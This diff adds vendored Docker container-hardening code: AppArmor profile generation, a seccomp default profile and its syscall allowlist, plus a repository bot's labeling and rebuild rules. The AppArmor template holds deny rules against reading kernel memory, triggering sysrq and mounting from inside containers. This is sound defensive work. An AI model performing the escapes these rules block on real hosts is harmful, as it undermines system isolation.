+            }
+        }
+
+# For every newly created or modified issue, assign label based on matching regexp using the `label`
+# operation, as well as an Engine-specific version label using `version-label`.
+- triggers:
+      issues:       [ edited, opened, reopened ]
+  operations:
+      - type:       label
+        settings: {
+            patterns: {
+                area/builder:        [ "dockerfile", "docker build" ],
+                area/distribution:   [ "docker login", "docker logout", "docker pull", "docker push", "docker search" ],
+                area/plugins:        [ "docker plugin" ],
+                area/networking:     [ "docker network", "ipvs", "vxlan" ],
+                area/runtime:        [ "oci runtime error" ],
+                area/security/trust: [ "docker_content_trust" ],
+                area/swarm:          [ "docker node", "docker service", "docker swarm" ],
+                platform/desktop:    [ "docker for mac", "docker for windows" ],
+                platform/freebsd:    [ "freebsd" ],
+                platform/windows:    [ "nanoserver", "windowsservercore", "windows server" ],
+            }
+        }
+      - type:       version-label
+
+# When a pull request is closed, attach it to the currently active milestone.
+- triggers:
+      pull_request: [ closed ]
+  operations:
+      - type:       version-milestone
+
+# Labeling a PR with `rebuild/<configuration>` triggers a rebuild job for the associated
+# configuration. The label is automatically removed after the rebuild is initiated. There's no such
+# thing as "templating" in this configuration, so we need one operation for each type of
+# configuration that can be triggered.
+- triggers:
+      pull_request: [ labeled ]
+  operations:
+      - type:       rebuild
+        settings: {
+            # When configurations are empty, the `rebuild` operation rebuilds all the currently
+            # known statuses for that pull request.
+            configurations: [],
+            label:          "rebuild/*",
+        }
+      - type:       rebuild
+        settings: {
+            configurations: [ arm ],
+            label:          "rebuild/arm",
+        }
+      - type:       rebuild
+        settings: {
+            configurations: [ experimental ],
+            label:          "rebuild/experimental",
+        }
+      - type:       rebuild
+        settings: {
+            configurations: [ janky ],
+            label:          "rebuild/janky",
+        }
+      - type:       rebuild
+        settings: {
+            configurations: [ userns ],
+            label:          "rebuild/userns",
+        }
+      - type:       rebuild
+        settings: {
+            configurations: [ vendor ],
+            label:          "rebuild/vendor",
+        }
+      - type:       rebuild
+        settings: {
+            configurations: [ win2lin ],
+            label:          "rebuild/win2lin",
+        }
+      - type:       rebuild
+        settings: {
+            configurations: [ windowsRS1 ],
+            label:          "rebuild/windowsRS1",
+        }
diff --git a/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go
new file mode 100644
index 0000000000..5132ebe008
--- /dev/null
+++ b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go
@@ -0,0 +1,122 @@
+// +build linux
+
+package apparmor
+
+import (
+	"bufio"
+	"io"
+	"io/ioutil"
+	"os"
+	"path"
+	"strings"
+
+	"github.com/docker/docker/pkg/aaparser"
+	"github.com/docker/docker/utils/templates"
+)
+
+var (
+	// profileDirectory is the file store for apparmor profiles and macros.
+	profileDirectory = "/etc/apparmor.d"
+)
+
+// profileData holds information about the given profile for generation.
+type profileData struct {
+	// Name is profile name.
+	Name string
+	// Imports defines the apparmor functions to import, before defining the profile.
+	Imports []string
+	// InnerImports defines the apparmor functions to import in the profile.
+	InnerImports []string
+	// Version is the {major, minor, patch} version of apparmor_parser as a single number.
+	Version int
+}
+
+// generateDefault creates an apparmor profile from ProfileData.
+func (p *profileData) generateDefault(out io.Writer) error {
+	compiled, err := templates.NewParse("apparmor_profile", baseTemplate)
+	if err != nil {
+		return err
+	}
+
+	if macroExists("tunables/global") {
+		p.Imports = append(p.Imports, "#include <tunables/global>")
+	} else {
+		p.Imports = append(p.Imports, "@{PROC}=/proc/")
+	}
+
+	if macroExists("abstractions/base") {
+		p.InnerImports = append(p.InnerImports, "#include <abstractions/base>")
+	}
+
+	ver, err := aaparser.GetVersion()
+	if err != nil {
+		return err
+	}
+	p.Version = ver
+
+	if err := compiled.Execute(out, p); err != nil {
+		return err
+	}
+	return nil
+}
+
+// macrosExists checks if the passed macro exists.
+func macroExists(m string) bool {
+	_, err := os.Stat(path.Join(profileDirectory, m))
+	return err == nil
+}
+
+// InstallDefault generates a default profile in a temp directory determined by
+// os.TempDir(), then loads the profile into the kernel using 'apparmor_parser'.
+func InstallDefault(name string) error {
+	p := profileData{
+		Name: name,
+	}
+
+	// Install to a temporary directory.
+	f, err := ioutil.TempFile("", name)
+	if err != nil {
+		return err
+	}
+	profilePath := f.Name()
+
+	defer f.Close()
+	defer os.Remove(profilePath)
+
+	if err := p.generateDefault(f); err != nil {
+		f.Close()
+		return err
+	}
+
+	if err := aaparser.LoadProfile(profilePath); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// IsLoaded checks if a profile with the given name has been loaded into the
+// kernel.
+func IsLoaded(name string) (bool, error) {
+	file, err := os.Open("/sys/kernel/security/apparmor/profiles")
+	if err != nil {
+		return false, err
+	}
+	defer file.Close()
+
+	r := bufio.NewReader(file)
+	for {
+		p, err := r.ReadString('\n')
+		if err == io.EOF {
+			break
+		}
+		if err != nil {
+			return false, err
+		}
+		if strings.HasPrefix(p, name+" ") {
+			return true, nil
+		}
+	}
+
+	return false, nil
+}
diff --git a/vendor/github.com/docker/docker/profiles/apparmor/template.go b/vendor/github.com/docker/docker/profiles/apparmor/template.go
new file mode 100644
index 0000000000..c5ea4584de
--- /dev/null
+++ b/vendor/github.com/docker/docker/profiles/apparmor/template.go
@@ -0,0 +1,46 @@
+// +build linux
+
+package apparmor
+
+// baseTemplate defines the default apparmor profile for containers.
+const baseTemplate = `
+{{range $value := .Imports}}
+{{$value}}
+{{end}}
+
+profile {{.Name}} flags=(attach_disconnected,mediate_deleted) {
+{{range $value := .InnerImports}}
+  {{$value}}
+{{end}}
+
+  network,
+  capability,
+  file,
+  umount,
+
+  deny @{PROC}/* w,   # deny write for all files directly in /proc (not in a subdir)
+  # deny write to files not in /proc/<number>/** or /proc/sys/**
+  deny @{PROC}/{[^1-9],[^1-9][^0-9],[^1-9s][^0-9y][^0-9s],[^1-9][^0-9][^0-9][^0-9]*}/** w,
+  deny @{PROC}/sys/[^k]** w,  # deny /proc/sys except /proc/sys/k* (effectively /proc/sys/kernel)
+  deny @{PROC}/sys/kernel/{?,??,[^s][^h][^m]**} w,  # deny everything except shm* in /proc/sys/kernel/
+  deny @{PROC}/sysrq-trigger rwklx,
+  deny @{PROC}/mem rwklx,
+  deny @{PROC}/kmem rwklx,
+  deny @{PROC}/kcore rwklx,
+
+  deny mount,
+
+  deny /sys/[^f]*/** wklx,
+  deny /sys/f[^s]*/** wklx,
+  deny /sys/fs/[^c]*/** wklx,
+  deny /sys/fs/c[^g]*/** wklx,
+  deny /sys/fs/cg[^r]*/** wklx,
+  deny /sys/firmware/** rwklx,
+  deny /sys/kernel/security/** rwklx,
+
+{{if ge .Version 208095}}
+  # suppress ptrace denials when using 'docker ps' or using 'ps' inside a container
+  ptrace (trace,read) peer={{.Name}},
+{{end}}
+}
+`
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/default.json b/vendor/github.com/docker/docker/profiles/seccomp/default.json
new file mode 100755
index 0000000000..ac129d3a31
--- /dev/null
+++ b/vendor/github.com/docker/docker/profiles/seccomp/default.json
@@ -0,0 +1,698 @@
+{
+	"defaultAction": "SCMP_ACT_ERRNO",
+	"archMap": [
+		{
+			"architecture": "SCMP_ARCH_X86_64",
+			"subArchitectures": [
+				"SCMP_ARCH_X86",
+				"SCMP_ARCH_X32"
+			]
+		},
+		{
+			"architecture": "SCMP_ARCH_AARCH64",
+			"subArchitectures": [
+				"SCMP_ARCH_ARM"
+			]
+		},
+		{
+			"architecture": "SCMP_ARCH_MIPS64",
+			"subArchitectures": [
+				"SCMP_ARCH_MIPS",
+				"SCMP_ARCH_MIPS64N32"
+			]
+		},
+		{
+			"architecture": "SCMP_ARCH_MIPS64N32",
+			"subArchitectures": [
+				"SCMP_ARCH_MIPS",
+				"SCMP_ARCH_MIPS64"
+			]
+		},
+		{
+			"architecture": "SCMP_ARCH_MIPSEL64",
+			"subArchitectures": [
+				"SCMP_ARCH_MIPSEL",
+				"SCMP_ARCH_MIPSEL64N32"
+			]
+		},
+		{
+			"architecture": "SCMP_ARCH_MIPSEL64N32",
+			"subArchitectures": [
+				"SCMP_ARCH_MIPSEL",
+				"SCMP_ARCH_MIPSEL64"
+			]
+		},
+		{
+			"architecture": "SCMP_ARCH_S390X",
+			"subArchitectures": [
+				"SCMP_ARCH_S390"
+			]
+		}
+	],
+	"syscalls": [
+		{
+			"names": [
+				"accept",
+				"accept4",
+				"access",
+				"alarm",
+				"alarm",
+				"bind",
+				"brk",
+				"capget",
+				"capset",
+				"chdir",
+				"chmod",
+				"chown",
+				"chown32",
+				"clock_getres",
+				"clock_gettime",
+				"clock_nanosleep",
+				"close",
+				"connect",
+				"copy_file_range",
+				"creat",
+				"dup",
+				"dup2",
+				"dup3",
+				"epoll_create",
+				"epoll_create1",
+				"epoll_ctl",
+				"epoll_ctl_old",
+				"epoll_pwait",
+				"epoll_wait",
+				"epoll_wait_old",
+				"eventfd",
+				"eventfd2",
+				"execve",
+				"execveat",
+				"exit",
+				"exit_group",
+				"faccessat",
+				"fadvise64",
+				"fadvise64_64",
+				"fallocate",
+				"fanotify_mark",
+				"fchdir",
+				"fchmod",
+				"fchmodat",
+				"fchown",
+				"fchown32",
+				"fchownat",
+				"fcntl",
+				"fcntl64",
+				"fdatasync",
+				"fgetxattr",
+				"flistxattr",
+				"flock",
+				"fork",
+				"fremovexattr",
+				"fsetxattr",
+				"fstat",
+				"fstat64",
+				"fstatat64",
+				"fstatfs",
+				"fstatfs64",
+				"fsync",
+				"ftruncate",
+				"ftruncate64",
+				"futex",
+				"futimesat",
+				"getcpu",
+				"getcwd",
+				"getdents",
+				"getdents64",
+				"getegid",
+				"getegid32",
+				"geteuid",
+				"geteuid32",
+				"getgid",
+				"getgid32",
+				"getgroups",
+				"getgroups32",
+				"getitimer",
+				"getpeername",
+				"getpgid",
+				"getpgrp",
+				"getpid",
+				"getppid",
+				"getpriority",
+				"getrandom",
+				"getresgid",
+				"getresgid32",
+				"getresuid",
+				"getresuid32",
+				"getrlimit",
+				"get_robust_list",
+				"getrusage",
+				"getsid",
+				"getsockname",
+				"getsockopt",
+				"get_thread_area",
+				"gettid",
+				"gettimeofday",
+				"getuid",
+				"getuid32",
+				"getxattr",
+				"inotify_add_watch",
+				"inotify_init",
+				"inotify_init1",
+				"inotify_rm_watch",
+				"io_cancel",
+				"ioctl",
+				"io_destroy",
+				"io_getevents",
+				"ioprio_get",
+				"ioprio_set",
+				"io_setup",
+				"io_submit",
+				"ipc",
+				"kill",
+				"lchown",
+				"lchown32",
+				"lgetxattr",
+				"link",
+				"linkat",
+				"listen",
+				"listxattr",
+				"llistxattr",
+				"_llseek",
+				"lremovexattr",
+				"lseek",
+				"lsetxattr",
+				"lstat",
+				"lstat64",
+				"madvise",
+				"memfd_create",
+				"mincore",
+				"mkdir",
+				"mkdirat",
+				"mknod",
+				"mknodat",
+				"mlock",
+				"mlock2",
+				"mlockall",
+				"mmap",
+				"mmap2",
+				"mprotect",
+				"mq_getsetattr",
+				"mq_notify",
+				"mq_open",
+				"mq_timedreceive",
+				"mq_timedsend",
+				"mq_unlink",
+				"mremap",
+				"msgctl",
+				"msgget",
+				"msgrcv",
+				"msgsnd",
+				"msync",
+				"munlock",
+				"munlockall",
+				"munmap",
+				"nanosleep",
+				"newfstatat",
+				"_newselect",
+				"open",
+				"openat",
+				"pause",
+				"pipe",
+				"pipe2",
+				"poll",
+				"ppoll",
+				"prctl",
+				"pread64",
+				"preadv",
+				"prlimit64",
+				"pselect6",
+				"pwrite64",
+				"pwritev",
+				"read",
+				"readahead",
+				"readlink",
+				"readlinkat",
+				"readv",
+				"recv",
+				"recvfrom",
+				"recvmmsg",
+				"recvmsg",
+				"remap_file_pages",
+				"removexattr",
+				"rename",
+				"renameat",
+				"renameat2",
+				"restart_syscall",
+				"rmdir",
+				"rt_sigaction",
+				"rt_sigpending",
+				"rt_sigprocmask",
+				"rt_sigqueueinfo",
+				"rt_sigreturn",
+				"rt_sigsuspend",
+				"rt_sigtimedwait",
+				"rt_tgsigqueueinfo",
+				"sched_getaffinity",
+				"sched_getattr",
+				"sched_getparam",
+				"sched_get_priority_max",
+				"sched_get_priority_min",
+				"sched_getscheduler",
+				"sched_rr_get_interval",
+				"sched_setaffinity",
+				"sched_setattr",
+				"sched_setparam",
+				"sched_setscheduler",
+				"sched_yield",
+				"seccomp",
+				"select",
+				"semctl",
+				"semget",
+				"semop",
+				"semtimedop",
+				"send",
+				"sendfile",
+				"sendfile64",
+				"sendmmsg",
+				"sendmsg",
+				"sendto",
+				"setfsgid",
+				"setfsgid32",
+				"setfsuid",
+				"setfsuid32",
+				"setgid",
+				"setgid32",
+				"setgroups",
+				"setgroups32",
+				"setitimer",
+				"setpgid",
+				"setpriority",
+				"setregid",
+				"setregid32",
+				"setresgid",
+				"setresgid32",
+				"setresuid",
+				"setresuid32",
+				"setreuid",
+				"setreuid32",
+				"setrlimit",
+				"set_robust_list",
+				"setsid",
+				"setsockopt",
+				"set_thread_area",
+				"set_tid_address",
+				"setuid",
+				"setuid32",
+				"setxattr",
+				"shmat",
+				"shmctl",
+				"shmdt",
+				"shmget",
+				"shutdown",
+				"sigaltstack",
+				"signalfd",
+				"signalfd4",
+				"sigreturn",
+				"socket",
+				"socketcall",
+				"socketpair",
+				"splice",
+				"stat",
+				"stat64",
+				"statfs",
+				"statfs64",
+				"symlink",
+				"symlinkat",
+				"sync",
+				"sync_file_range",
+				"syncfs",
+				"sysinfo",
+				"syslog",
+				"tee",
+				"tgkill",
+				"time",
+				"timer_create",
+				"timer_delete",
+				"timerfd_create",
+				"timerfd_gettime",
+				"timerfd_settime",
+				"timer_getoverrun",
+				"timer_gettime",
+				"timer_settime",
+				"times",
+				"tkill",
+				"truncate",
+				"truncate64",
+				"ugetrlimit",
+				"umask",
+				"uname",
+				"unlink",
+				"unlinkat",
+				"utime",
+				"utimensat",
+				"utimes",
+				"vfork",
+				"vmsplice",
+				"wait4",
+				"waitid",
+				"waitpid",
+				"write",
+				"writev"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"personality"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [
+				{
+					"index": 0,
+					"value": 0,
+					"valueTwo": 0,
+					"op": "SCMP_CMP_EQ"
+				}
+			],
+			"comment": "",
+			"includes": {},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"personality"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [
+				{
+					"index": 0,
+					"value": 8,
+					"valueTwo": 0,
+					"op": "SCMP_CMP_EQ"
+				}
+			],
+			"comment": "",
+			"includes": {},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"personality"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [
+				{
+					"index": 0,
+					"value": 4294967295,
+					"valueTwo": 0,
+					"op": "SCMP_CMP_EQ"
+				}
+			],
+			"comment": "",
+			"includes": {},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"arm_fadvise64_64",
+				"arm_sync_file_range",
+				"breakpoint",
+				"cacheflush",
+				"set_tls"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"arches": [
+					"arm",
+					"arm64"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"arch_prctl"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"arches": [
+					"amd64",
+					"x32"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"modify_ldt"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"arches": [
+					"amd64",
+					"x32",
+					"x86"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"s390_pci_mmio_read",
+				"s390_pci_mmio_write",
+				"s390_runtime_instr"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"arches": [
+					"s390",
+					"s390x"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"open_by_handle_at"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_DAC_READ_SEARCH"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"bpf",
+				"clone",
+				"fanotify_init",
+				"lookup_dcookie",
+				"mount",
+				"name_to_handle_at",
+				"perf_event_open",
+				"setdomainname",
+				"sethostname",
+				"setns",
+				"umount",
+				"umount2",
+				"unshare"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_SYS_ADMIN"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"clone"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [
+				{
+					"index": 0,
+					"value": 2080505856,
+					"valueTwo": 0,
+					"op": "SCMP_CMP_MASKED_EQ"
+				}
+			],
+			"comment": "",
+			"includes": {},
+			"excludes": {
+				"caps": [
+					"CAP_SYS_ADMIN"
+				],
+				"arches": [
+					"s390",
+					"s390x"
+				]
+			}
+		},
+		{
+			"names": [
+				"clone"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [
+				{
+					"index": 1,
+					"value": 2080505856,
+					"valueTwo": 0,
+					"op": "SCMP_CMP_MASKED_EQ"
+				}
+			],
+			"comment": "s390 parameter ordering for clone is different",
+			"includes": {
+				"arches": [
+					"s390",
+					"s390x"
+				]
+			},
+			"excludes": {
+				"caps": [
+					"CAP_SYS_ADMIN"
+				]
+			}
+		},
+		{
+			"names": [
+				"reboot"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_SYS_BOOT"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"chroot"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_SYS_CHROOT"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"delete_module",
+				"init_module",
+				"finit_module",
+				"query_module"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_SYS_MODULE"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"acct"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_SYS_PACCT"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"kcmp",
+				"process_vm_readv",
+				"process_vm_writev",
+				"ptrace"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_SYS_PTRACE"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"iopl",
+				"ioperm"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_SYS_RAWIO"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"settimeofday",
+				"stime",
+				"adjtimex"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_SYS_TIME"
+				]
+			},
+			"excludes": {}
+		},
+		{
+			"names": [
+				"vhangup"
+			],
+			"action": "SCMP_ACT_ALLOW",
+			"args": [],
+			"comment": "",
+			"includes": {
+				"caps": [
+					"CAP_SYS_TTY_CONFIG"
+				]
+			},
+			"excludes": {}
+		}
+	]
+}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json b/vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json
new file mode 100755
index 0000000000..674ca50fd9
--- /dev/null
+++ b/vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json
@@ -0,0 +1,27 @@
+{
+    "defaultAction": "SCMP_ACT_ERRNO",
+    "syscalls": [
+        {
+            "name": "clone",
+            "action": "SCMP_ACT_ALLOW",
+            "args": [
+                {
+                    "index": 0,
+                    "value": 2080505856,
+                    "valueTwo": 0,
+                    "op": "SCMP_CMP_MASKED_EQ"
+                }
+            ]
+        },
+        {
+            "name": "open",
+            "action": "SCMP_ACT_ALLOW",
+            "args": []
+        },
+        {
+            "name": "close",
+            "action": "SCMP_ACT_ALLOW",
+            "args": []
+        }
+    ]
+}
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/generate.go b/vendor/github.com/docker/docker/profiles/seccomp/generate.go
new file mode 100644
index 0000000000..32f22bb375
--- /dev/null
+++ b/vendor/github.com/docker/docker/profiles/seccomp/generate.go
@@ -0,0 +1,32 @@
+// +build ignore
+
+package main
+
+import (
+	"encoding/json"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/profiles/seccomp"
+)
+
+// saves the default seccomp profile as a json file so people can use it as a
+// base for their own custom profiles
+func main() {
+	wd, err := os.Getwd()
+	if err != nil {
+		panic(err)
+	}
+	f := filepath.Join(wd, "default.json")
+
+	// write the default profile to the file
+	b, err := json.MarshalIndent(seccomp.DefaultProfile(), "", "\t")
+	if err != nil {
+		panic(err)
+	}
+
+	if err := ioutil.WriteFile(f, b, 0644); err != nil {
+		panic(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go
new file mode 100644
index 0000000000..a54ef50a8b
--- /dev/null
+++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go
@@ -0,0 +1,150 @@
+// +build linux
+
+package seccomp
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	libseccomp "github.com/seccomp/libseccomp-golang"
+)
+
+//go:generate go run -tags 'seccomp' generate.go
+
+// GetDefaultProfile returns the default seccomp profile.
+func GetDefaultProfile(rs *specs.Spec) (*specs.Seccomp, error) {
+	return setupSeccomp(DefaultProfile(), rs)
+}
+
+// LoadProfile takes a file path and decodes the seccomp profile.
+func LoadProfile(body string, rs *specs.Spec) (*specs.Seccomp, error) {
+	var config types.Seccomp
+	if err := json.Unmarshal([]byte(body), &config); err != nil {
+		return nil, fmt.Errorf("Decoding seccomp profile failed: %v", err)
+	}
+	return setupSeccomp(&config, rs)
+}
+
+var nativeToSeccomp = map[string]types.Arch{
+	"amd64":       types.ArchX86_64,
+	"arm64":       types.ArchAARCH64,
+	"mips64":      types.ArchMIPS64,
+	"mips64n32":   types.ArchMIPS64N32,
+	"mipsel64":    types.ArchMIPSEL64,
+	"mipsel64n32": types.ArchMIPSEL64N32,
+	"s390x":       types.ArchS390X,
+}
+
+func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) {
+	if config == nil {
+		return nil, nil
+	}
+
+	// No default action specified, no syscalls listed, assume seccomp disabled
+	if config.DefaultAction == "" && len(config.Syscalls) == 0 {
+		return nil, nil
+	}
+
+	newConfig := &specs.Seccomp{}
+
+	var arch string
+	var native, err = libseccomp.GetNativeArch()
+	if err == nil {
+		arch = native.String()
+	}
+
+	if len(config.Architectures) != 0 && len(config.ArchMap) != 0 {
+		return nil, errors.New("'architectures' and 'archMap' were specified in the seccomp profile, use either 'architectures' or 'archMap'")
+	}
+
+	// if config.Architectures == 0 then libseccomp will figure out the architecture to use
+	if len(config.Architectures) != 0 {
+		for _, a := range config.Architectures {
+			newConfig.Architectures = append(newConfig.Architectures, specs.Arch(a))
+		}
+	}
+
+	if len(config.ArchMap) != 0 {
+		for _, a := range config.ArchMap {
+			seccompArch, ok := nativeToSeccomp[arch]
+			if ok {
+				if a.Arch == seccompArch {
+					newConfig.Architectures = append(newConfig.Architectures, specs.Arch(a.Arch))
+					for _, sa := range a.SubArches {
+						newConfig.Architectures = append(newConfig.Architectures, specs.Arch(sa))
+					}
+					break
+				}
+			}
+		}
+	}
+
+	newConfig.DefaultAction = specs.Action(config.DefaultAction)
+
+Loop:
+	// Loop through all syscall blocks and convert them to libcontainer format after filtering them
+	for _, call := range config.Syscalls {
+		if len(call.Excludes.Arches) > 0 {
+			if stringutils.InSlice(call.Excludes.Arches, arch) {
+				continue Loop
+			}
+		}
+		if len(call.Excludes.Caps) > 0 {
+			for _, c := range call.Excludes.Caps {
+				if stringutils.InSlice(rs.Process.Capabilities, c) {
+					continue Loop
+				}
+			}
+		}
+		if len(call.Includes.Arches) > 0 {
+			if !stringutils.InSlice(call.Includes.Arches, arch) {
+				continue Loop
+			}
+		}
+		if len(call.Includes.Caps) > 0 {
+			for _, c := range call.Includes.Caps {
+				if !stringutils.InSlice(rs.Process.Capabilities, c) {
+					continue Loop
+				}
+			}
+		}
+
+		if call.Name != "" && len(call.Names) != 0 {
+			return nil, errors.New("'name' and 'names' were specified in the seccomp profile, use either 'name' or 'names'")
+		}
+
+		if call.Name != "" {
+			newConfig.Syscalls = append(newConfig.Syscalls, createSpecsSyscall(call.Name, call.Action, call.Args))
+		}
+
+		for _, n := range call.Names {
+			newConfig.Syscalls = append(newConfig.Syscalls, createSpecsSyscall(n, call.Action, call.Args))
+		}
+	}
+
+	return newConfig, nil
+}
+
+func createSpecsSyscall(name string, action types.Action, args []*types.Arg) specs.Syscall {
+	newCall := specs.Syscall{
+		Name:   name,
+		Action: specs.Action(action),
+	}
+
+	// Loop through all the arguments of the syscall and convert them
+	for _, arg := range args {
+		newArg := specs.Arg{
+			Index:    arg.Index,
+			Value:    arg.Value,
+			ValueTwo: arg.ValueTwo,
+			Op:       specs.Operator(arg.Op),
+		}
+
+		newCall.Args = append(newCall.Args, newArg)
+	}
+	return newCall
+}
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go
new file mode 100644
index 0000000000..b84de820b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go
@@ -0,0 +1,604 @@
+// +build linux,seccomp
+
+package seccomp
+
+import (
+	"syscall"
+
+	"github.com/docker/docker/api/types"
+)
+
+func arches() []types.Architecture {
+	return []types.Architecture{
+		{
+			Arch:      types.ArchX86_64,
+			SubArches: []types.Arch{types.ArchX86, types.ArchX32},
+		},
+		{
+			Arch:      types.ArchAARCH64,
+			SubArches: []types.Arch{types.ArchARM},
+		},
+		{
+			Arch:      types.ArchMIPS64,
+			SubArches: []types.Arch{types.ArchMIPS, types.ArchMIPS64N32},
+		},
+		{
+			Arch:      types.ArchMIPS64N32,
+			SubArches: []types.Arch{types.ArchMIPS, types.ArchMIPS64},
+		},
+		{
+			Arch:      types.ArchMIPSEL64,
+			SubArches: []types.Arch{types.ArchMIPSEL, types.ArchMIPSEL64N32},
+		},
+		{
+			Arch:      types.ArchMIPSEL64N32,
+			SubArches: []types.Arch{types.ArchMIPSEL, types.ArchMIPSEL64},
+		},
+		{
+			Arch:      types.ArchS390X,
+			SubArches: []types.Arch{types.ArchS390},
+		},
+	}
+}
+
+// DefaultProfile defines the whitelist for the default seccomp profile.
+func DefaultProfile() *types.Seccomp {
+	syscalls := []*types.Syscall{
+		{
+			Names: []string{
+				"accept",
+				"accept4",
+				"access",
+				"alarm",
+				"alarm",
+				"bind",
+				"brk",
+				"capget",
+				"capset",
+				"chdir",
+				"chmod",
+				"chown",
+				"chown32",
+				"clock_getres",
+				"clock_gettime",
+				"clock_nanosleep",
+				"close",
+				"connect",
+				"copy_file_range",
+				"creat",
+				"dup",
+				"dup2",
+				"dup3",
+				"epoll_create",
+				"epoll_create1",
+				"epoll_ctl",
+				"epoll_ctl_old",
+				"epoll_pwait",
+				"epoll_wait",
+				"epoll_wait_old",
+				"eventfd",
+				"eventfd2",
+				"execve",
+				"execveat",
+				"exit",
+				"exit_group",
+				"faccessat",
+				"fadvise64",
+				"fadvise64_64",
+				"fallocate",
+				"fanotify_mark",
+				"fchdir",
+				"fchmod",
+				"fchmodat",
+				"fchown",
+				"fchown32",
+				"fchownat",
+				"fcntl",
+				"fcntl64",
+				"fdatasync",
+				"fgetxattr",
+				"flistxattr",
+				"flock",
+				"fork",
+				"fremovexattr",
+				"fsetxattr",
+				"fstat",
+				"fstat64",
+				"fstatat64",
+				"fstatfs",
+				"fstatfs64",
+				"fsync",
+				"ftruncate",
+				"ftruncate64",
+				"futex",
+				"futimesat",
+				"getcpu",
+				"getcwd",
+				"getdents",
+				"getdents64",
+				"getegid",
+				"getegid32",
+				"geteuid",
+				"geteuid32",
+				"getgid",
+				"getgid32",
+				"getgroups",
+				"getgroups32",
+				"getitimer",
+				"getpeername",
+				"getpgid",
+				"getpgrp",
+				"getpid",
+				"getppid",
+				"getpriority",
+				"getrandom",
+				"getresgid",
+				"getresgid32",
+				"getresuid",
+				"getresuid32",
+				"getrlimit",
+				"get_robust_list",
+				"getrusage",
+				"getsid",
+				"getsockname",
+				"getsockopt",
+				"get_thread_area",
+				"gettid",
+				"gettimeofday",
+				"getuid",
+				"getuid32",
+				"getxattr",
+				"inotify_add_watch",
+				"inotify_init",
+				"inotify_init1",
+				"inotify_rm_watch",
+				"io_cancel",
+				"ioctl",
+				"io_destroy",
+				"io_getevents",
+				"ioprio_get",
+				"ioprio_set",
+				"io_setup",
+				"io_submit",
+				"ipc",
+				"kill",
+				"lchown",
+				"lchown32",
+				"lgetxattr",
+				"link",
+				"linkat",
+				"listen",
+				"listxattr",
+				"llistxattr",
+				"_llseek",
+				"lremovexattr",
+				"lseek",
+				"lsetxattr",
+				"lstat",
